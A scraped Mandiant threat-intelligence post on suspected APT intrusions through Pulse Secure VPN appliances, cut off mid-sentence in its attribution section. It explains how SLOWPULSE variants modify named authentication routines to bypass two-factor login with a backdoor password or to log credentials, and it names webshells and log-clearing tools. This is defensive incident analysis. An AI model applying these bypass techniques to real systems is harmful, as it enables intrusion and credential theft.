sTwy6JTbRKzJr"]],[],'','-49Bz_4wsckd3k4vDG-wCQ','IrMwwvIEuc2HNgGc6OONSQ','DEFAULT','\/blog', 2024.0 ,'https:\/\/cloud.google.com\/blog\/topics\/threat-intelligence\/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day\/', null ,'ltr', false ,'https:\/\/accounts.google.com\/AccountChooser?continue\x3dhttps:\/\/cloud.google.com\/blog\/topics\/threat-intelligence\/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day\/\x26hl\x3den-US','https:\/\/accounts.google.com\/ServiceLogin?hl\x3den-US\x26continue\x3dhttps:\/\/cloud.google.com\/blog\/topics\/threat-intelligence\/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day\/','https:\/\/accounts.google.com\/SignOutOptions?continue\x3dhttps:\/\/cloud.google.com\/blog\/topics\/threat-intelligence\/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day\/',[[[1]]], false , false , false ,'en','en-US','en_US','https:\/\/goto2.corp.google.com\/mdtredirect?data_id_filter\x3dcloud.google.com\x26system_name\x3dcloudx-web-blog-uiserver', null , null ,'https:\/\/myaccount.google.com\/privacypolicy?hl\x3den-US', false , null ,'https:\/\/www.gstatic.com\/_\/boq-cloudx-web-blog\/_\/r\/','https:\/\/myaccount.google.com\/termsofservice?hl\x3den-US',[[[["Solutions \u0026 technology",null,[[["AI \u0026 Machine Learning","/blog/products/ai-machine-learning"],["API Management","/blog/products/api-management"],["Application Development","/blog/products/application-development"],["Application Modernization","/blog/products/application-modernization"],["Chrome Enterprise","/blog/products/chrome-enterprise"],["Compute","/blog/products/compute"],["Containers \u0026 Kubernetes","/blog/products/containers-kubernetes"],["Data Analytics","/blog/products/data-analytics"],["Databases","/blog/products/databases"],["DevOps \u0026 SRE","/blog/products/devops-sre"],["Maps \u0026 Geospatial","/blog/topics/maps-geospatial"],["Security",null,[[["Security \u0026 Identity","/blog/products/identity-security"],["Threat Intelligence","/blog/topics/threat-intelligence"]]]],["Infrastructure","/blog/products/infrastructure"],["Infrastructure Modernization","/blog/products/infrastructure-modernization"],["Networking","/blog/products/networking"],["Productivity \u0026 Collaboration","/blog/products/productivity-collaboration"],["SAP on Google Cloud","/blog/products/sap-google-cloud"],["Storage \u0026 Data Transfer","/blog/products/storage-data-transfer"],["Sustainability","/blog/topics/sustainability"]]]],["Ecosystem",null,[[["IT Leaders","/transform"],["Industries",null,[[["Financial Services","/blog/topics/financial-services"],["Healthcare \u0026 Life Sciences","/blog/topics/healthcare-life-sciences"],["Manufacturing","/blog/topics/manufacturing"],["Media \u0026 Entertainment","/blog/products/media-entertainment"],["Public Sector","/blog/topics/public-sector"],["Retail","/blog/topics/retail"],["Supply Chain","/blog/topics/supply-chain-logistics"],["Telecommunications","/blog/topics/telecommunications"]]]],["Partners","/blog/topics/partners"],["Startups \u0026 SMB","/blog/topics/startups"],["Training \u0026 Certifications","/blog/topics/training-certifications"],["Inside Google Cloud","/blog/topics/inside-google-cloud"],["Google Cloud Next \u0026 Events","/blog/topics/google-cloud-next"],["Google Maps Platform","https://mapsplatform.google.com/resources/blog/"],["Google Workspace","https://workspace.google.com/blog"]]]],["Developers \u0026 Practitioners","/blog/topics/developers-practitioners"],["Transform with Google Cloud","/transform"]]],[["de",[[["Neuigkeiten","/blog/de/topics/whats-new/aktuelles-auf-dem-google-cloud-blog"],["Lösungen \u0026 Technologien",null,[[["Anwendungsentwicklung","/blog/de/products/application-development"],["Anwendungsmodernisierung","/blog/de/products/anwendungsmodernisierung"],["API-Verwaltung","/blog/de/products/api-management"],["Chrome Enterprise","/blog/de/products/chrome-enterprise"],["Computing","/blog/de/products/compute"],["Containers \u0026 Kubernetes","/blog/de/products/containers-kubernetes"],["Datenanalysen","/blog/de/products/data-analytics"],["Datenbanken","/blog/de/products/databases"],["DevOps \u0026 SRE","/blog/de/products/devops-sre"],["Infrastruktur","/blog/de/products/infrastructure"],["KI \u0026 Machine Learning","/blog/de/products/ai-machine-learning"],["Maps \u0026 Geospatial","/blog/de/topics/maps-geospatial"],["Modernisierung der Infrastruktur","/blog/de/products/modernisierung-der-infrastruktur"],["Nachhaltigkeit","/blog/de/topics/nachhaltigkeit"],["Netzwerk","/blog/de/products/networking"],["Produktivität und Zusammenarbeit","/blog/de/products/produktivitaet-und-kollaboration"],["SAP in Google Cloud","/blog/de/products/sap-google-cloud"],["Sicherheit \u0026 Identität","/blog/de/products/identity-security"],["Speicher und Datentransfer","/blog/de/products/storage-data-transfer"]]]],["Ökosystem",null,[[["IT Leader","/transform/de"],["Industrien",null,[[["Behörden und öffentlicher Sektor","/blog/de/topics/public-sector"],["Einzelhandel","/blog/de/topics/retail"],["Fertigung","/blog/de/topics/fertigung"],["Finanzdienstleistungen","/blog/de/topics/financial-services"],["Gesundheitswesen und Biowissenschaften","/blog/de/topics/healthcare-life-sciences"],["Lieferkette und Logistik","/blog/de/topics/lieferkette-und-logistik"],["Medien und Unterhaltung","/blog/de/products/media-entertainment"],["Telekommunikation","/blog/de/topics/telecommunications"]]]],["Entwickler*innen \u0026 Fachkräfte","/blog/de/topics/developers-practitioners"],["Google Cloud Next \u0026 Events","/blog/de/topics/events"],["Google Maps Platform","/blog/de/products/maps-platform"],["Google Workspace","https://workspace.google.com/blog/de"],["Inside Google Cloud","/blog/de/topics/inside-google-cloud"],["Kunden","/blog/de/topics/kunden"],["Partner","/blog/de/topics/partners"],["Start-ups und KMU","/blog/de/topics/startups"],["Training und Zertifizierung","/blog/de/topics/training-certifications"]]]],["Transformation mit Google Cloud","/transform/de"]]]],["en",[[["Solutions \u0026 technology",null,[[["AI \u0026 Machine Learning","/blog/products/ai-machine-learning"],["API Management","/blog/products/api-management"],["Application Development","/blog/products/application-development"],["Application Modernization","/blog/products/application-modernization"],["Chrome Enterprise","/blog/products/chrome-enterprise"],["Compute","/blog/products/compute"],["Containers \u0026 Kubernetes","/blog/products/containers-kubernetes"],["Data Analytics","/blog/products/data-analytics"],["Databases","/blog/products/databases"],["DevOps \u0026 SRE","/blog/products/devops-sre"],["Maps \u0026 Geospatial","/blog/topics/maps-geospatial"],["Security",null,[[["Security \u0026 Identity","/blog/products/identity-security"],["Threat Intelligence","/blog/topics/threat-intelligence"]]]],["Infrastructure","/blog/products/infrastructure"],["Infrastructure Modernization","/blog/products/infrastructure-modernization"],["Networking","/blog/products/networking"],["Productivity \u0026 Collaboration","/blog/products/productivity-collaboration"],["SAP on Google Cloud","/blog/products/sap-google-cloud"],["Storage \u0026 Data Transfer","/blog/products/storage-data-transfer"],["Sustainability","/blog/topics/sustainability"]]]],["Ecosystem",null,[[["IT Leaders","/transform"],["Industries",null,[[["Financial Services","/blog/topics/financial-services"],["Healthcare \u0026 Life Sciences","/blog/topics/healthcare-life-sciences"],["Manufacturing","/blog/topics/manufacturing"],["Media \u0026 Entertainment","/blog/products/media-entertainment"],["Public Sector","/blog/topics/public-sector"],["Retail","/blog/topics/retail"],["Supply Chain","/blog/topics/supply-chain-logistics"],["Telecommunications","/blog/topics/telecommunications"]]]],["Partners","/blog/topics/partners"],["Startups \u0026 SMB","/blog/topics/startups"],["Training \u0026 Certifications","/blog/topics/training-certifications"],["Inside Google Cloud","/blog/topics/inside-google-cloud"],["Google Cloud Next \u0026 Events","/blog/topics/google-cloud-next"],["Google Maps Platform","https://mapsplatform.google.com/resources/blog/"],["Google Workspace","https://workspace.google.com/blog"]]]],["Developers \u0026 Practitioners","/blog/topics/developers-practitioners"],["Transform with Google Cloud","/transform"]]]],["fr",[[["Les tendances","/blog/fr/topics/les-tendances/quelles-sont-les-nouveautes-de-google-cloud"],["Solutions et Technologie",null,[[["Analyse de données","/blog/fr/products/analyse-de-donnees/"],["Bases de données","/blog/fr/products/databases"],["Calcul","/blog/fr/products/calcul/"],["Chrome Entreprise","/blog/fr/products/chrome-enterprise/"],["Conteneurs et Kubernetes","/blog/fr/products/conteneurs-et-kubernetes/"],["Développement d'Applications","/blog/fr/products/application-development"],["Développement durable","/blog/fr/topics/developpement-durable"],["DevOps et ingénierie SRE","/blog/fr/products/devops-sre"],["Gestion des API","/blog/fr/products/api-management"],["IA et Machine Learning","/blog/fr/products/ai-machine-learning"],["Infrastructure","/blog/fr/products/infrastructure"],["Maps et Géospatial","/blog/fr/topics/maps-geospatial"],["Modernisation d'Applications","/blog/fr/products/modernisation-dapplications/"],["Modernisation d'Infrastructure","/blog/fr/products/modernisation-dinfrastructure/"],["Networking","/blog/fr/products/networking"],["Productivité et Collaboration","/blog/fr/products/productivite-et-collaboration"],["SAP sur Google Cloud","/blog/fr/products/sap-google-cloud"],["Sécurité et Identité","/blog/fr/products/identity-security"],["Stockage et transfert de données","/blog/fr/products/storage-data-transfer"]]]],["Écosystème",null,[[["Responsables IT","/transform/fr"],["Industries",null,[[["Commerce","/blog/fr/topics/retail"],["Manufacturing","/blog/fr/topics/manufacturing"],["Médias et Divertissement","/blog/fr/products/media-entertainment"],["Santé","/blog/fr/topics/healthcare-life-sciences"],["Secteur Public","/blog/fr/topics/public-sector"],["Services Financiers","/blog/fr/topics/financial-services"],["Supply Chain","/blog/fr/topics/supply-chain/"],["Telecommunications","/blog/fr/topics/telecommunications"]]]],["Clients","/blog/fr/topics/clients/"],["Développeurs et professionnels","/blog/fr/topics/developers-practitioners"],["Formations et certifications","/blog/fr/topics/training-certifications"],["Google Cloud Next et Événements","/blog/fr/topics/evenements"],["Google Maps Platform","/blog/fr/products/maps-platform"],["Google Workspace","https://workspace.google.com/blog/fr"],["Inside Google Cloud","/blog/fr/topics/inside-google-cloud"],["Partenaires","/blog/fr/topics/partners"],["Start-ups et PME","/blog/fr/topics/startups"]]]],["Transformer avec Google Cloud","/transform/fr"]]]],["ja",[[["ソリューションとテクノロジー",null,[[["AI \u0026 機械学習","/blog/ja/products/ai-machine-learning"],["API 管理","/blog/ja/products/api-management"],["アプリケーション開発","/blog/ja/products/application-development"],["アプリケーション モダナイゼーション","/blog/ja/products/application-modernization"],["Chrome Enterprise","/blog/ja/products/chrome-enterprise"],["コンピューティング","/blog/ja/products/compute"],["Containers \u0026 Kubernetes","/blog/ja/products/containers-kubernetes"],["データ分析","/blog/ja/products/data-analytics"],["データベース","/blog/ja/products/databases"],["DevOps \u0026 SRE","/blog/ja/products/devops-sre"],["Maps \u0026 Geospatial","/blog/ja/products/maps-platform"],["セキュリティ",null,[[["セキュリティ \u0026 アイデンティティ","/blog/ja/products/identity-security"],["脅威インテリジェンス","/blog/ja/topics/threat-intelligence"]]]],["インフラストラクチャ","/blog/ja/products/infrastructure"],["インフラ モダナイゼーション","/blog/ja/products/infrastructure-modernization"],["ネットワーキング","/blog/ja/products/networking"],["生産性とコラボレーション","/blog/ja/products/productivity-collaboration"],["Google Cloud での SAP","/blog/ja/products/sap-google-cloud"],["ストレージとデータ転送","/blog/ja/products/storage-data-transfer"],["サステナビリティ","/blog/ja/topics/sustainability"]]]],["エコシステム",null,[[["ITリーダー","/transform/ja"],["業種",null,[[["金融サービス","/blog/ja/topics/financial-services"],["ヘルスケア、ライフ サイエンス","/blog/ja/topics/healthcare-life-sciences"],["製造","/blog/ja/topics/manufacturing"],["メディア、エンターテイメント","/blog/ja/products/media-entertainment"],["公共部門","/blog/ja/topics/public-sector"],["小売業","/blog/ja/topics/retail"],["サプライ チェーン","/blog/ja/topics/supply-chain-logistics"],["通信","/blog/ja/topics/telecommunications"]]]],["顧客事例","/blog/ja/topics/customers"],["パートナー","/blog/ja/topics/partners"],["スタートアップ \u0026 SMB","/blog/ja/topics/startups"],["トレーニングと認定","/blog/ja/topics/training-certifications"],["Inside Google Cloud","/blog/ja/topics/inside-google-cloud"],["Google Cloud Next と イベント","/blog/ja/topics/google-cloud-next"],["Google Maps Platform","/blog/ja/products/maps-platform"],["Google Workspace","https://workspace.google.com/blog/ja"]]]],["デベロッパー","/blog/ja/topics/developers-practitioners"],["Transform with Google Cloud","/transform/ja"]]]],["ko",[[["솔루션 및 기술",null,[[["AI 및 머신러닝","/blog/ko/products/ai-machine-learning"],["API 관리","/blog/ko/products/api-management"],["애플리케이션 개발","/blog/ko/products/application-development"],["애플리케이션 현대화","/blog/ko/products/application-modernization"],["Chrome Enterprise","/blog/products/chrome-enterprise"],["컴퓨팅","/blog/ko/products/compute"],["컨테이너 \u0026 Kubernetes","/blog/ko/products/containers-kubernetes"],["데이터 분석","/blog/ko/products/data-analytics"],["데이터베이스","/blog/ko/products/databases"],["DevOps 및 SRE","/blog/ko/products/devops-sre"],["Maps \u0026 Geospatial","/blog/ko/products/maps-platform"],["보안",null,[[["보안 \u0026 아이덴티티","/blog/ko/products/identity-security"],["위협 인텔리전스","/blog/ko/topics/threat-intelligence"]]]],["인프라","/blog/ko/products/infrastructure"],["Infrastructure Modernization","/blog/ko/products/infrastructure-modernization"],["네트워킹","/blog/ko/products/networking"],["생산성 및 공동작업","/blog/ko/products/productivity-collaboration"],["SAP on Google Cloud","/blog/ko/products/sap-google-cloud"],["스토리지 및 데이터 전송","/blog/ko/products/storage-data-transfer"],["지속가능성","/blog/ko/topics/sustainability"]]]],["에코시스템",null,[[["IT Leaders","/transform/ko"],["업종",null,[[["금융 서비스","/blog/ko/topics/financial-services"],["의료 및 생명과학","/blog/ko/topics/healthcare-life-sciences"],["제조업","/blog/ko/topics/manufacturing"],["미디어 및 엔터테인먼트","/blog/ko/products/media-entertainment"],["공공부문","/blog/ko/topics/public-sector"],["소매업","/blog/ko/topics/retail"],["공급망","/blog/topics/supply-chain-logistics"],["통신","/blog/ko/topics/telecommunications"]]]],["고객 사례","/blog/ko/topics/customers"],["파트너","/blog/ko/topics/partners"],["스타트업 \u0026 SMB","/blog/ko/topics/startups"],["교육 \u0026 인증","/blog/ko/topics/training-certifications"],["Inside Google Cloud","/blog/ko/topics/inside-google-cloud"],["Google Cloud Next 및 이벤트","/blog/ko/topics/google-cloud-next"],["Google Maps Platform","/blog/ko/products/maps-platform"],["Google Workspace","https://workspace.google.com/blog/ko"]]]],["개발 및 IT운영","/blog/ko/topics/developers-practitioners"],["Google Cloud와 함께 하는 디지털 혁신","/transform/ko"]]]]]],'cloud.google.com','https', null , false , null ,[[48887080,97684533,97863170,97785986,93778619,1706538,1714256,97656897,48830069,97863043,48554503,97535270,97517170,48897392,97442197,93874002,48489833,97716269,48887064,97684517,97785970,97656881,97517154,97442181,93873986],null,null,null,null,true],]; window.IJ_valuesCb && window.IJ_valuesCb();</script><script class="ds:0" nonce="-49Bz_4wsckd3k4vDG-wCQ">AF_initDataCallback({key: 'ds:0', hash: '1', data:[["Authentication Bypass Techniques and Pulse Secure Zero-Day","We examine multiple techniques for bypassing single \u0026 multifactor authentication on Pulse Secure VPN devices and maintaining access through webshells.",[1618887600],"https://storage.googleapis.com/gweb-cloudblog-publish/images/threat-intelligence-default-banner-simplif.max-2600x2600.png","https://cloud.google.com/blog/topics/threat-intelligence/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day",[1711404892,352955000]],[["Mandiant "]],[null,"\u003cscript type\u003d\"application/ld+json\"\u003e{\"@context\":\"https://schema.org\",\"@type\":\"BlogPosting\",\"@id\":\"https://cloud.google.com/blog/topics/threat-intelligence/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day\",\"headline\":\"Authentication Bypass Techniques and Pulse Secure Zero-Day\",\"description\":\"We examine multiple techniques for bypassing single \\u0026 multifactor authentication on Pulse Secure VPN devices and maintaining access through webshells.\",\"image\":\"https://storage.googleapis.com/gweb-cloudblog-publish/images/threat-intelligence-default-banner-simplif.max-2600x2600.png\",\"author\":[{\"@type\":\"Person\",\"name\":\"Mandiant \",\"url\":\"\"}],\"datePublished\":\"2021-04-20\",\"publisher\":{\"@type\":\"Organization\",\"name\":\"Google Cloud\",\"logo\":{\"@type\":\"ImageObject\",\"url\":\"https://www.gstatic.com/devrel-devsite/prod/v8bb8fa0afe9a8c3a776ebeb25d421bb443344d789b3607754dfabea418b8c4be/cloud/images/cloud-logo.svg\"}},\"url\":\"https://cloud.google.com/blog/topics/threat-intelligence/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day\",\"keywords\":[\"Threat Intelligence\",\"Security \\u0026 Identity\"],\"timeRequired\":\"PT31M\"}\u003c/script\u003e"],["Check Your Pulse: Suspected APT Actors Leverage Authentication Bypass Techniques and Pulse Secure Zero-Day"],null,null,[[null,null,[null,[null,"\u003cp\u003eWritten by: Dan Perez, Sarah Jones, Greg Wood, Stephen Eckels\u003c/p\u003e\n\u003chr\u003e"]]],[null,null,[null,[null,"\u003ch4\u003eExecutive Summary\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eMandiant recently responded to multiple security incidents involving compromises of Pulse Secure VPN appliances.\u003c/li\u003e\n\u003cli\u003eThis blog post examines multiple, related techniques for bypassing single and multifactor authentication on Pulse Secure VPN devices, persisting across upgrades, and maintaining access through webshells.\u003c/li\u003e\n\u003cli\u003eThe investigation by Pulse Secure has determined that a combination of prior vulnerabilities and a previously unknown vulnerability discovered in April 2021, \u003ca href\u003d\"https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784/\" rel\u003d\"noopener\" target\u003d\"_blank\"\u003eCVE-2021-22893\u003c/a\u003e, are responsible for the initial infection vector.\u003c/li\u003e\n\u003cli\u003ePulse Secure\u2019s parent company, Ivanti, released mitigations for a vulnerability exploited in relation to these malware families and the \u003ca href\u003d\"https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44755\" rel\u003d\"noopener\" target\u003d\"_blank\"\u003ePulse Connect Secure Integrity Tool\u003c/a\u003e for their customers to determine if their systems are impacted. A final patch to address the vulnerability will be available in early May 2021.\u003c/li\u003e\n\u003cli\u003ePulse Secure has been working closely with Mandiant, affected customers, government partners, and other forensic experts to address these issues.\u003c/li\u003e\n\u003cli\u003eThere is no indication the identified backdoors were introduced through a supply chain compromise of the company\u2019s network or software deployment process.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eIntroduction\u003c/h4\u003e\n\u003cp\u003eMandiant is currently tracking 12 malware families associated with the exploitation of Pulse Secure VPN devices. These families are related to the circumvention of authentication and backdoor access to these devices, but they are not necessarily related to each other and have been observed in separate investigations. It is likely that multiple actors are responsible for the creation and deployment of these various code families.\u003c/p\u003e\n\u003cp\u003eThe focus of this report is on the activities of UNC2630 against U.S. Defense Industrial base (DIB) networks, but detailed malware analysis and detection methods for all samples observed at U.S. and European victim organizations are provided in the technical annex to assist network defenders in identifying a large range of malicious activity on affected appliances. Analysis is ongoing to determine the extent of the activity.\u003c/p\u003e\n\u003cp\u003eMandiant continues to collaborate with the Ivanti and Pulse Secure teams, Microsoft Threat Intelligence Center (MSTIC), and relevant government and law enforcement agencies to investigate the threat, as well as develop recommendations and mitigations for affected Pulse Secure VPN appliance owners.\u003c/p\u003e\n\u003cp\u003eAs part of their investigation, Ivanti has released mitigations for a vulnerability exploited in relation to this campaign as well as the \u003ca href\u003d\"https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44755\" rel\u003d\"noopener\" target\u003d\"_blank\"\u003ePulse Connect Secure Integrity Tool\u003c/a\u003e to assist with determining if systems have been impacted.\u003c/p\u003e\n\u003ch4\u003eDetails\u003c/h4\u003e\n\u003cp\u003eEarly this year, Mandiant investigated multiple intrusions at defense, government, and financial organizations around the world. In each intrusion, the earliest evidence of attacker activity traced back to DHCP IP address ranges belonging to Pulse Secure VPN appliances in the affected environment.\u003c/p\u003e\n\u003cp\u003eIn many cases, we were not able to determine how actors obtained administrator-level access to the appliances. However, based on analysis by Ivanti, we suspect some intrusions were due to the exploitation of previously disclosed Pulse Secure vulnerabilities from 2019 and 2020 while other intrusions were due to the exploitation of \u003ca href\u003d\"https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784/\" rel\u003d\"noopener\" target\u003d\"_blank\"\u003eCVE-2021-22893\u003c/a\u003e.\u003c/p\u003e\n\u003cp\u003eWe observed UNC2630 harvesting credentials from various Pulse Secure VPN login flows, which ultimately allowed the actor to use legitimate account credentials to move laterally into the affected environments. In order to maintain persistence to the compromised networks, the actor utilized legitimate, but modified, Pulse Secure binaries and scripts on the VPN appliance. This was done to accomplish the following:\u003c/p\u003e\n\u003col\u003e\n\u003cli\u003eTrojanize shared objects with malicious code to log credentials and bypass authentication flows, including multifactor authentication requirements. We track these trojanized assemblies as SLOWPULSE and its variants.\u003c/li\u003e\n\u003cli\u003eInject webshells we currently track as RADIALPULSE and PULSECHECK into legitimate Internet-accessible Pulse Secure VPN appliance administrative web pages for the devices.\u003c/li\u003e\n\u003cli\u003eToggle the filesystem between Read-Only and Read-Write modes to allow for file modification on a typically Read-Only filesystem.\u003c/li\u003e\n\u003cli\u003eMaintain persistence across VPN appliance general upgrades that are performed by the administrator.\u003c/li\u003e\n\u003cli\u003eUnpatch modified files and delete utilities and scripts after use to evade detection.\u003c/li\u003e\n\u003cli\u003eClear relevant log files utilizing a utility tracked as THINBLOOD based on an actor defined regular expression.\u003c/li\u003e\n\u003c/ol\u003e\n\u003cp\u003eIn a separate incident in March 2021, we observed UNC2717 using RADIALPULSE, PULSEJUMP, and HARDPULSE at a European organization. Although we did not observe PULSEJUMP or HARDPULSE used by UNC2630 against U.S. DIB companies, these malware families have shared characteristics and serve similar purposes to other code families used by UNC2630. We also observed an OpenSSL library file modified in similar fashion as the other trojanized shared objects. We believe that the modified library file, which we\u2019ve named LOCKPICK, could weaken encryption for communications used by the appliance, but do not have enough evidence to confirm this.\u003c/p\u003e\n\u003cp\u003eDue to a lack of context and forensic evidence at this time, Mandiant cannot associate all the code families described in this report to UNC2630 or UNC2717. We also note the possibility that one or more related groups is responsible for the development and dissemination of these different tools across loosely connected APT actors. It is likely that additional groups beyond UNC2630 and UNC2717 have adopted one or more of these tools. Despite these gaps in our understanding, we included detailed analysis, detection techniques, and mitigations for all code families in the Technical Annex.\u003c/p\u003e\n\u003ch4\u003eSLOWPULSE\u003c/h4\u003e\n\u003cp\u003eDuring our investigation into the activities of UNC2630, we uncovered a novel malware family we labeled SLOWPULSE. This malware and its variants are applied as modifications to legitimate Pulse Secure files to bypass or log credentials in the authentication flows that exist within the legitimate Pulse Secure shared object libdsplibs.so. Three of the four discovered variants enable the attacker to bypass two-factor authentication. A brief overview of these variants is covered in this section, refer to the Technical Annex for more details.\u003c/p\u003e\n\u003ch5\u003eSLOWPULSE Variant 1\u003c/h5\u003e\n\u003cp\u003eThis variant is responsible for bypassing LDAP and RADIUS-2FA authentication routines if a secret backdoor password is provided by the attacker. The sample inspects login credentials used at the start of each protocol\u2019s associated routine and strategically forces execution down the successful authentication patch if the provided password matches the attacker's chosen backdoor password.\u003c/p\u003e\n\u003cp\u003e\u003cem\u003eLDAP Auth Bypass\u003c/em\u003e\u003c/p\u003e\n\u003cp\u003eThe routine DSAuth::LDAPAuthServer::authenticate begins the LDAP authentication procedure. This variant inserts a check against the backdoor password after the bind routine so that the return value can be conditionally stomped to spoof successful authentication.\u003c/p\u003e"]]],[null,null,null,null,null,null,null,null,[[[null,"\u003cp\u003eFigure 1: LDAP Auth Bypass\u003c/p\u003e"],["https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure1_0_ayeu.max-1300x1300.png","https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure1_0_ayeu.max-1100x1100.png 1060w, https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure1_0_ayeu.max-1300x1300.png 1260w"," 1060px, 1260px","https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure1_0_ayeu.max-1300x1300.png"],null,3]]],[null,null,[null,[null,"\u003cp\u003e\u003cem\u003eRADIUS Two Factor Auth Bypass\u003c/em\u003e\u003c/p\u003e\n\u003cp\u003eThe routine DSAuth::RadiusAuthServer::checkUsernamePassword begins the RADIUS-2FA authentication procedure. This variant inserts checks against the backdoor password after the RADIUS authentication packet is received back from the authentication server. If the backdoor password is provided by the attacker, the packet type and successful authentication status flags are overwritten to spoof successful authentication.\u003c/p\u003e"]]],[null,null,null,null,null,null,null,null,[[[null,"\u003cp\u003eFigure 2: Radius-2FA Bypass\u003c/p\u003e"],["https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure2_0_ivmt.max-1300x1300.png","https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure2_0_ivmt.max-1100x1100.png 1060w, https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure2_0_ivmt.max-1300x1300.png 1264w"," 1060px, 1264px","https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure2_0_ivmt.max-1300x1300.png"],null,3]]],[null,null,[null,[null,"\u003ch5\u003eSLOWPULSE Variant 2\u003c/h5\u003e\n\u003cp\u003e\u003cem\u003eACE Two Factor Auth Credential Logging\u003c/em\u003e\u003c/p\u003e\n\u003cp\u003eThis variant logs credentials used during the ACE-2FA authentication procedure DSAuth::AceAuthServer::checkUsernamePassword. Rather than bypassing authentication, this variant logs the username and password to a file for later use by the attacker.\u003c/p\u003e"]]],[null,null,null,null,null,null,null,null,[[[null,"\u003cp\u003eFigure 3: ACE Auth Credential Log\u003c/p\u003e"],["https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure3_qswp.max-1300x1300.png","https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure3_qswp.max-1100x1100.png 1060w, https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure3_qswp.max-1300x1300.png 1260w"," 1060px, 1260px","https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure3_qswp.max-1300x1300.png"],null,3]]],[null,null,[null,[null,"\u003ch5\u003eSLOWPULSE Variant 3\u003c/h5\u003e\n\u003cp\u003e\u003cem\u003eACE Two Factor Auth Bypass\u003c/em\u003e\u003c/p\u003e\n\u003cp\u003eThis variant is responsible for bypassing the ACE-2FA logon procedure starting with DSAuth::AceAuthServer::checkUsernamePassword. The flow of the authentication procedure is modified to bypass the routine responsible for verifying the username and password if the backdoor password is provided. With this modification the attacker can spoof successful authentication.\u003c/p\u003e"]]],[null,null,null,null,null,null,null,null,[[[null,"\u003cp\u003eFigure 4: ACE Auth Bypass Variant\u003c/p\u003e"],["https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure4_meyx.max-1300x1300.png","https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure4_meyx.max-1100x1100.png 1060w, https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure4_meyx.max-1300x1300.png 1258w"," 1060px, 1258px","https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure4_meyx.max-1300x1300.png"],null,3]]],[null,null,[null,[null,"\u003ch5\u003eSLOWPULSE Variant 4\u003c/h5\u003e\n\u003cp\u003e\u003cem\u003eRealmSignin Two Factor Auth Bypass\u003c/em\u003e\u003c/p\u003e\n\u003cp\u003eThis variant bypasses the RealmSignin::runSecondaryAuth procedure of the Pulse Secure VPN. The inserted logic modifies the execution flow of a specific step of the login process to spoof successful authentication. We believe that this may be a two-factor authentication bypass.\u003c/p\u003e"]]],[null,null,null,null,null,null,null,null,[[[null,"\u003cp\u003eFigure 5: RealmSignIn 2FA Auth Bypass\u003c/p\u003e"],["https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure5_bwvy.max-1300x1300.png","https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure5_bwvy.max-1100x1100.png 1060w, https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure5_bwvy.max-1300x1300.png 1254w"," 1060px, 1254px","https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure5_bwvy.max-1300x1300.png"],null,3]]],[null,null,[null,[null,"\u003ch4\u003eAttribution\u003c/h4\u003e\n\u003cp\u003eWe are in the early stages of gathering evidence and making attribution assessments and there are a number of gaps in our understanding of UNC2630, UNC2717, and these 12 code families. Nevertheless, the Mandiant and Ivanti teams are proactively releasing this analysis to assist network defenders in triaging and identifying malicious activity on affected appliances.\u003c/p\u003e\n\u003cp\u003eMandiant is able to assess that:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eUNC2630 targeted U.S. DIB companies with SLOWPULSE, RADIALPULSE, THINBLOOD, ATRIUM, PACEMAKER, SLIGHTPULSE, and PULSECHECK as early as August 2020 until March 2021.\r\n\u003cul\u003e\n\u003cli\u003eWe suspect UNC2630 operates on behalf of the Chinese government and may have ties to APT5\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003eUNC2717 targeted global government agencies between October 2020 and March 2021 using HARDPULSE, QUIETPULSE, AND PULSEJUMP.\r\n\u003cul\u003e\n\u003cli\u003eWe do not have enough evidence about UNC2717 to determine government sponsorship or suspected affiliation with any known APT group.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003eWe do not have enough information about the use of LOCKPICK to make an attribution statement.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch5\u003eUNC2630\u003c/h5\u003e\n\u003cp\u003eUNC2630\u2019s combination of infrastructure, tools, and on-network behavior appear to be unique, and we have not observed them during any other campaigns or at any other engagement. Despite these new tools and infrastructure, Mandiant analysts noted strong similarities to historic intrusions dating back to 2014 and 2015 and conducted by Chinese espionage actor APT5. We have also uncovered limited evidence to suggest that UNC2630 operates on behalf of the Chinese government. Analysis is still ongoing to determine the full scope of the activity that maybe related to the group.\u003c/p\u003e\n\u003cp\u003eAlthough we are not able to definitively connect UNC2630 to APT5, or any other existing APT group, a trusted third party has uncovered evidence connecting this activity to historic campaigns which Mandiant tracks as Chinese espionage actor APT5. While we cannot make the same connections, the third party assessment is consistent with our understanding of APT5 and their historic TTPs and 